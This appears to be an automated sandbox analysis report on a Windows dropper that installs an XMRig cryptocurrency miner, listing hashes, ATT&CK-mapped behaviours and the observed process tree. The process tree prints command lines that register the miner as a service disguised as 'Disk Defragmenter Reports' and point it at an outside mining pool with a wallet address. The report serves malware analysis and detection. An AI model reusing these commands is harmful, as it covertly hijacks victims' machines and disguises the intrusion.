xmrig | f5ce46e1e3cdf8b10dc0a3111fa6bc33f10c57a6513b9b3de083ded4dac19395

Analysis

max time kernel
148s
max time network
151s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22-12-2024 19:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe
Size

916KB
MD5

47ce7fdd09c103f348bf25353aff6d98
SHA1

f71108f19aceb14258b7e1b772d3994b64a7a87b
SHA256

8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625
SHA512

18873a53f42b9bee5817b4ccf9bf3912c4f11b555d86b9b21e59bf489452ec47c8bcf46f827cbc559661a24b4d628dcb62bb02f0fb1de99f271c434775388d67
SSDEEP

12288:SvfyIIIzAClE7uDOch+h2ul/mJoz3Wdtp3ldri8L7nuWVJKajDZ1/zdP1T:esSzlEqF+hVcOwt1RfzfjDZ9BdT

Score

10^/10

xmrig discovery miner upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/files/0x0007000000016d66-30.dat	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	irsetup.exe
File created	C:\Windows\System32\drivers\etc\hosts	irsetup.exe

Executes dropped EXE 6 IoCs

pid	Process
2300	irsetup.exe
2476	svchost.exe
2748	svchost.exe
476	Process not Found
2632	svchost.exe
2256	csrss.exe

Loads dropped DLL 9 IoCs

pid	Process
2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe
2300	irsetup.exe
2300	irsetup.exe
2300	irsetup.exe
2300	irsetup.exe
2300	irsetup.exe
3056	cmd.exe
3056	cmd.exe
2632	svchost.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000016d42-1.dat	upx
behavioral1/memory/2084-4-0x00000000025A0000-0x00000000026C7000-memory.dmp	upx
behavioral1/memory/2300-50-0x0000000000400000-0x0000000000527000-memory.dmp	upx

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2872	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	irsetup.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2932	PING.EXE
2972	PING.EXE
1612	PING.EXE

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
2932	PING.EXE
2972	PING.EXE
1612	PING.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2256	csrss.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2300	irsetup.exe
2300	irsetup.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2084 wrote to memory of 2300	2084	8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe	31
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 2300 wrote to memory of 3056	2300	irsetup.exe	32
PID 3056 wrote to memory of 2476	3056	cmd.exe	34
PID 3056 wrote to memory of 2476	3056	cmd.exe	34
PID 3056 wrote to memory of 2476	3056	cmd.exe	34
PID 3056 wrote to memory of 2476	3056	cmd.exe	34
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2932	3056	cmd.exe	35
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2872	3056	cmd.exe	36
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2972	3056	cmd.exe	37
PID 3056 wrote to memory of 2748	3056	cmd.exe	38
PID 3056 wrote to memory of 2748	3056	cmd.exe	38
PID 3056 wrote to memory of 2748	3056	cmd.exe	38
PID 3056 wrote to memory of 2748	3056	cmd.exe	38
PID 2632 wrote to memory of 2256	2632	svchost.exe	41
PID 2632 wrote to memory of 2256	2632	svchost.exe	41
PID 2632 wrote to memory of 2256	2632	svchost.exe	41
PID 3056 wrote to memory of 1612	3056	cmd.exe	42
PID 3056 wrote to memory of 1612	3056	cmd.exe	42
PID 3056 wrote to memory of 1612	3056	cmd.exe	42
PID 3056 wrote to memory of 1612	3056	cmd.exe	42
PID 3056 wrote to memory of 1612	3056	cmd.exe	42
PID 3056 wrote to memory of 1612	3056	cmd.exe	42
PID 3056 wrote to memory of 1612	3056	cmd.exe	42

C:\Users\Admin\AppData\Local\Temp\8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe
"C:\Users\Admin\AppData\Local\Temp\8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe
  __IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\ProgramData\windows\run64.bat
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\ProgramData\windows\svchost.exe
      C:\ProgramData\windows\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\windows\csrss.exe -o get.bi-chi.com:5555 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k
      4⤵
      Executes dropped EXE
      PID:2476
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 3 127.0.0.1
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2932
  - - C:\Windows\SysWOW64\sc.exe
      sc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:2872
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2972
  - - C:\ProgramData\windows\svchost.exe
      C:\ProgramData\windows\svchost.exe start "Disk Defragmenter Reports"
      4⤵
      Executes dropped EXE
      PID:2748
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 3 127.0.0.1
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1612

C:\ProgramData\windows\svchost.exe
C:\ProgramData\windows\svchost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632
- C:\ProgramData\windows\csrss.exe
  "C:\ProgramData\windows\csrss.exe" -o get.bi-chi.com:5555 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\windows\csrss.exe

Filesize
424KB

MD5
20e01f78a4ea17385722e9e051acd3f4

SHA1
d4f1c64dc03a0d7d65b8c9bae57eb8e474e6faf5

SHA256
f36892b46a9315431e45283a38d2a5fcdd21e2233631ffb2d1fc904cb11f76d3

SHA512
2dc288c449a1effe550240d05a969fa53b56141ef532ba1151aa44de188ea4ba96f66fb42814f162ebdf37fc55875c4f4a537ddb16ae7efa151322bb9b6b2473

Download Submit
C:\ProgramData\windows\run64.bat

Filesize
477B

MD5
1edbb85ab0d74309d369e14ffee9bd8f

SHA1
a3a2333677c6eab34bcacc780a9697b83e9f0a4d

SHA256
c5fc2888da7c8bde80cab3f3bb4f90a9e65e1dece2b7de1f377d9a5f31d83695

SHA512
f37fa509dd389439d38a7e32540086de9bf80d5b478979450764c0b2be08262da07b2febf1f6ef3b7183b769ad596f6c9e711275e7ef40fdcff3a73cb0987b5c

Download Submit
\ProgramData\windows\svchost.exe

Filesize
345KB

MD5
1e706b1e8d3bd3764e3ee4bf5fe509d8

SHA1
ba457bfcdc1b66609f142c3578be647c51d1356d

SHA256
29f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74

SHA512
f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe

Filesize
440KB

MD5
75ca7ff96bf5a316c3af2de6a412bd54

SHA1
0a093950790ff0dddff6f5f29c6b02c10997e0c5

SHA256
d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1

SHA512
b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4

Download Submit
memory/2084-4-0x00000000025A0000-0x00000000026C7000-memory.dmp

Filesize
1.2MB

Download
memory/2300-14-0x0000000000530000-0x0000000000657000-memory.dmp

Filesize
1.2MB

Download
memory/2300-26-0x0000000000530000-0x0000000000657000-memory.dmp

Filesize
1.2MB

Download
memory/2300-50-0x0000000000400000-0x0000000000527000-memory.dmp

Filesize
1.2MB

Download